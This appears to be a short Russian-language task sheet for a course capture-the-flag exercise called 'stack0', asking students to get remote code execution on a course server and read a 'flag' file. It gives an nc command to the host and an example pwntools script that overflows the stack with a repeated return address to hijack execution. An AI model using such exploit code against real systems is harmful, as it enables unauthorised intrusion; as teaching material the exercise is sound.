# stack0

Вам нужно получить RCE на сервере и украсть флаг из файла `flag`.

```
nc crashme.best-cpp-course-ever.ru 443
```

Обратите внимание, что исполняемый файл 32-битный. Нужно поставить на linux дополнительные пакеты, чтобы он запускался.

## Example

```python
from pwn import *

p = remote('130.211.73.21', 80)
# p = process("./example1")

log.info("Hijacking IP")

ip = 0x080484cb

p.write(p32(ip) * 100 + '\n')

p.interactive()
```